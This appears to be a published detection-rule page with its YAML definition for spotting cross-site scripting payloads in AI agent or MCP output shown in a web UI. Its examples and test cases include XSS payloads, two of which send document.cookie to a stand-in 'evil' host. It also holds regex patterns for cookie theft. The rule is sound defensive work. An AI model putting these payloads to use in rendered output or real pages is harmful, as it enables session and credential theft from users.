Skip to content
ATR-2026-00571highContext Exfiltrationexperimental

Cross-site scripting (XSS) in agent / MCP rendered output

Agent/MCP output rendered in a web UI carries an XSS payload — an event handler that runs alert/eval/document.cookie, a javascript: scheme with a payload, or a <script> that exfiltrates cookies — enabling session/credential theft. Uses specific payload shapes (not bare <script>) to stay clean on benign HTML.

Severity
high
Category
Context Exfiltration
Scan Target
runtime
Author
ATR Community

Response Actions

alert

References

OWASP Agentic
ASI01:2026 - Agent Goal Hijack
OWASP LLM
LLM02:2025 - Sensitive Information Disclosure
MITRE ATLAS
AML.T0057 - LLM Data Leakage

Detection Conditions

Combinator: any
  1. 01
    HTML event handler executing alert/eval/document.cookie
    field: contentop: regex
  2. 02
    javascript: scheme with an executable payload
    field: contentop: regex
  3. 03
    <script> exfiltrating cookies / loading remote code
    field: contentop: regex

Attack Examples (Rule Triggers)

  1. <img src=x onerror=alert(document.cookie)>
  2. <a href="javascript:fetch('//evil/'+document.cookie)">
  3. <script>new Image().src='//evil/?c='+document.cookie</script>

Real-world attack payloads, sanitized and versioned alongside the rule as regression tests — so a future revision can't silently stop catching them.

Benign Examples (Rule Doesn't Trigger)

  1. benign 1
    <button onclick="handleSubmit()">Save</button>
  2. benign 2
    <script src="https://cdn.example.com/lib.js"></script>
  3. benign 3
    <a href="https://example.com">link</a>
  4. benign 4
    See the onload event in the docs

Full YAML Definition

Edit on GitHub →
title: Cross-site scripting (XSS) in agent / MCP rendered output
id: ATR-2026-00571
rule_version: 1
status: experimental
description: 'Agent/MCP output rendered in a web UI carries an XSS payload — an event handler that runs alert/eval/document.cookie, a javascript: scheme with a payload, or a <script> that exfiltrates cookies — enabling session/credential theft. Uses specific payload shapes (not bare <script>) to stay clean on benign HTML.'
author: ATR Community
date: 2026/06/02
schema_version: '0.1'
detection_tier: pattern
maturity: test
severity: high
references:
  cve:
  - CVE-2025-62800
  - CVE-2026-44429
  - CVE-2026-27740
  - CVE-2026-21866
  cwe:
  - CWE-79
  external:
  - https://github.com/jlowin/fastmcp/security/advisories
  owasp_llm:
    - LLM02:2025 - Sensitive Information Disclosure
  owasp_agentic:
    - ASI01:2026 - Agent Goal Hijack
  mitre_atlas:
    - AML.T0057 - LLM Data Leakage
metadata_provenance:
  cve: human-authored
  cwe: human-authored
compliance:
  eu_ai_act:
    - article: "15"
      context: "Article 15 (accuracy, robustness and cybersecurity) requires high-risk AI systems to resist unauthorised attempts to alter their use, outputs or performance; this rule provides runtime detection evidence by flagging the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output)."
      strength: primary
    - article: "10"
      context: "Article 10 (data and data governance) requires control over the data an AI system processes; this rule provides detection evidence for the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output) affecting that data."
      strength: secondary
  nist_ai_rmf:
    - subcategory: "MS.2.7"
      context: "NIST AI RMF MEASURE 2.7 (security and resilience evaluated and documented) is supported by this rule's runtime detection of the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output)."
      strength: primary
    - subcategory: "MS.2.10"
      context: "NIST AI RMF MEASURE 2.10 (privacy risk examined and documented) is supported by this rule's detection of the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output)."
      strength: secondary
  iso_42001:
    - clause: "8.1"
      context: "ISO/IEC 42001 Clause 8.1 (operational planning and control, including control of externally provided processes) is operationalised by this rule's detection of the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output)."
      strength: primary
    - clause: "6.2"
      context: "ISO/IEC 42001 Clause 6.2 (AI objectives and planning) calls for risk treatment of known attack patterns; this rule's detection of the context-exfiltration attempt (Cross-site scripting (XSS) in agent / MCP rendered output) is such a treatment."
      strength: secondary
tags:
  category: context-exfiltration
  scan_target: runtime
  confidence: high
agent_source:
  type: llm_io
  framework:
  - any
  provider:
  - any
detection:
  condition: any
  false_positives: []
  conditions:
  - field: content
    operator: regex
    value: (?i)\bon(?:error|load|mouseover|click|focus|toggle)\s*=\s*[\"']?\s*(?:alert|eval|fetch|document\.(?:cookie|location|write)|window\.|location\s*=|String\.fromCharCode|atob)\b
    description: HTML event handler executing alert/eval/document.cookie
  - field: content
    operator: regex
    value: (?i)javascript:\s*(?:alert|eval|document\.|window\.|fetch|String\.fromCharCode|void)
    description: 'javascript: scheme with an executable payload'
  - field: content
    operator: regex
    value: (?i)<script[^>]*>[^<]{0,200}?(?:document\.cookie|fetch\(|eval\(|atob\(|new\s+Image\(\)\.src|\.src\s*=\s*[\"']?https?://)
    description: <script> exfiltrating cookies / loading remote code
response:
  actions:
  - alert
  notify:
  - security_team
test_cases:
  true_positives:
  - input: <img src=x onerror=alert(document.cookie)>
    expected: triggered
    description: attack 1
  - input: <a href="javascript:fetch('//evil/'+document.cookie)">
    expected: triggered
    description: attack 2
  - input: <script>new Image().src='//evil/?c='+document.cookie</script>
    expected: triggered
    description: attack 3
  true_negatives:
  - input: <button onclick="handleSubmit()">Save</button>
    expected: not_triggered
    description: benign 1
  - input: <script src="https://cdn.example.com/lib.js"></script>
    expected: not_triggered
    description: benign 2
  - input: <a href="https://example.com">link</a>
    expected: not_triggered
    description: benign 3
  - input: See the onload event in the docs
    expected: not_triggered
    description: benign 4

Revision History

Created
2026-06-02
Last modified
2026-07-15
View full commit history on GitHub →